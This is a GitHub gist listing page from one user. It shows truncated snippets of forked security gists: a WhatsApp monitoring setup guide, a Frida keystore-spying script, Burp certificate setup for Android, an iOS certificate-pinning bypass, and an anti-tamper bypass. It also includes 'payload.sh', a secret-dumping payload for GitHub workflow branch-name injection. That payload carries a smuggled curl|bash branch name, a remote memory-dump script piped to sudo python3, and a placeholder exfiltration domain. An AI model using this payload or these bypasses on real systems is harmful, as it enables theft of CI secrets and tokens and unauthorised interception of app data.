
@AkshayJainG
AkshayJainG / Environment_for_Monitoring_WhatsApp.md
Created August 10, 2024 06:01 — forked from alexeinazarov/Environment_for_Monitoring_WhatsApp.md
Environment Installation Guide for Monitoring WhatsApp Activities

Comprehensive Environment Installation Guide for Monitoring WhatsApp Activities

This guide provides a detailed setup process for students to monitor various activities within WhatsApp, including audio, video, contacts, cookies, and other data interactions. The setup involves using dynamic instrumentation tools like Frida, filesystem monitoring tools like inotifywait, and network traffic monitoring tools like mitmproxy and Wireshark.

Prerequisites

  • A Linux host machine
  • Android Studio or Genymotion for Android emulation
  • Rooted Android emulator for advanced monitoring (optional)
  • Basic knowledge of Android development and Linux command-line tools
@AkshayJainG
AkshayJainG / keystore_spy.js
Created August 10, 2024 06:00 — forked from akabe1/keystore_spy.js
A script to detect Android Keystore calls
/* Android Keystore calls detection script
by Maurizio Siddu
Run with:
frida -U -f [APP_ID] -l keystore_spy.js --no-pause
*/
setTimeout(function() {
Java.perform(function() {
console.log('')
@AkshayJainG
AkshayJainG / payload.sh
Created December 1, 2023 06:34
Universal "dump all secrets" payload for GitHub workflow branch name injection.
# Replace with Burp collaborator domain or similar.
YOUR_EXFIL="https://your-exfil-domain.com"
# Deliver via branch name: 'Hacked”;{curl,-sSfL,gist.githubusercontent.com/YourUser/Hash/raw/payload.sh}${IFS}|${IFS}bash'
# Uses memory dump technique from github.com/nikitastupin/pwnhub / with regex to parse out all secret values (including GITHUB_TOKEN)
if [[ "$OSTYPE" == "linux-gnu" ]]; then
B64_BLOB=`curl -sSf https://gist.githubusercontent.com/nikitastupin/30e525b776c409e03c2d6f328f254965/raw/memdump.py | sudo python3 | tr -d '\0' | grep -aoE '"[^"]+":\{"value":"[^"]*","isSecret":true\}' | sort -u | base64 -w 0 | base64 -w 0`
# Print to run log
echo $B64_BLOB

TL;DR

  • I found 1 browser, 1 language, and 15 vulnerabilities in { Web Framework, HTTP Client library, Email library / Web Service, etc }
  • All the vulnerabilities I found were found from a single perspective (I investigated maybe 50-80 products).
  • The RFC description of the problem (rather confusingly) describes the requirements for this problem, while the WHATWG HTML Spec is well documented.
  • The problem is clearly targeted at the Content-Disposition fields filename and filename*.
  • This problem affects HTTP Request/Response/Email in different ways.
    • HTTP Request: request tampering (especially with file contents, tainting of other fields, etc.)
    • HTTP Response: Reflected File Download vulnerability
    • Email: attachment tampering (e.g., extension and filename tampering and potential file content tampering)
@AkshayJainG
AkshayJainG / gist:2971fb673aa707464beca6ddf20fbaa9
Created August 1, 2023 14:01 — forked from sdcampbell/gist:35398cb2e0263a11ba6c329c3b1d8e05
Paste this into your browser developer console to print all URL paths found in all JavaScript loaded by the page.
javascript:(function(){
  var scripts=document.getElementsByTagName("script"),
      regex=/(?<=(\"|\%27|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|\'|\%60))/g;
  const results=new Set;
  for(var i=0;i<scripts.length;i++){
    var t=scripts[i].src;
    ""!=t&&fetch(t).then(function(t){return t.text()}).then(function(t){var e=t.matchAll(regex);for(let r of e)results.add(r[0])}).catch(function(t){console.log("An error occurred: ",t)})
  }
  var pageContent=document.documentElement.outerHTML,matches=pageContent.matchAll(regex);
  for(const match of matches)results.add(match[0]);
  function writeResults(){results.forEach(function(t){document.write(t+"<br>")})}
  setTimeout(writeResults,3e3);
})();
@AkshayJainG
AkshayJainG / android12burp.md
Created September 25, 2022 15:57 — forked from TobiasS1402/android12burp.md
Android 12 BurpSuite intercepting

generating certificate

My Android 12 does not accept the default Burp certificate; you have to generate a unique certificate. Then import it into Burp and use the commands below to make it compatible with Android.

mkdir cert && cd cert
openssl req -x509 -days 730 -nodes -newkey rsa:2048 -outform der -keyout server.key -out ca.der -extensions v3_ca #generate ca
openssl rsa -in server.key -inform pem -out server.key.der -outform der #convert
openssl pkcs8 -topk8 -in server.key.der -inform der -out server.key.pkcs8.der -outform der -nocrypt #convert to pkcs8

openssl x509 -inform der -in ca.der -out ca.pem
cp ca.pem `openssl x509 -inform pem -subject_hash_old -in ca.pem | head -1`.0 #create a filename with the hash
@AkshayJainG
AkshayJainG / ios14-certificate-pinning-bypass.md
Created September 25, 2022 15:57 — forked from AkdM/ios14-certificate-pinning-bypass.md
iOS 14 app TLS decrypt / certificate pinning bypass steps

This is not a tutorial, just a small guide to myself, but feel free to get some info here.

Working on an iPhone 7 running iOS 14.5.1

  1. Jailbreak an iPhone/iPad/whatever

  2. If necessary, you'll need to bypass Jailbreak detection for some apps with tweaks like A-Bypass, Hestia, HideJB, etc.

  3. Get the PID of the app you want to capture traffic from with frida-ps -Ua (a is for showing running apps only; you can use -U alone to show all running processes instead)

@AkshayJainG
AkshayJainG / DOCKER-IN-AN-HOUR.md
Created March 27, 2022 19:15 — forked from leonjza/DOCKER-IN-AN-HOUR.md
Docker in an hour Workshop

docker-in-an-hour

@leonjza

Welcome to docker-in-an-hour! This is a "JIT" for docker, with many explanations being just enough to defend yourself. It is highly recommended that you go and at least Google some of the stuff here after doing the workshop. Read the official docs with real explanations.

toc

@AkshayJainG
AkshayJainG / bypassAntiTamper.js
Created March 21, 2022 11:29 — forked from rodnt/bypassAntiTamper.js
Simple bypass of iOS anti-tamper checks: ptrace, sysctl, strstr, getppid
/**
* Rodolfo 'rodnt' Tavares
* twitter @rodntt
* github rodnt
*/
if(ObjC.available) {
const tamperLibs = [
"Substrate",
@AkshayJainG
AkshayJainG / enc_str.cc
Created October 17, 2021 16:22 — forked from yujincheng08/enc_str.cc
Compile time encrypt string
#include "enc_str.h"
#include <cstdio>
static_assert(next_prime<next_prime<4>> == next_prime<4> && next_prime<4> == 5, "??");
static constexpr auto j = "I love vvb2060 and she's my wife."_senc;
static constexpr auto k = ".."_senc;
static constexpr auto l = j + k;
int main() {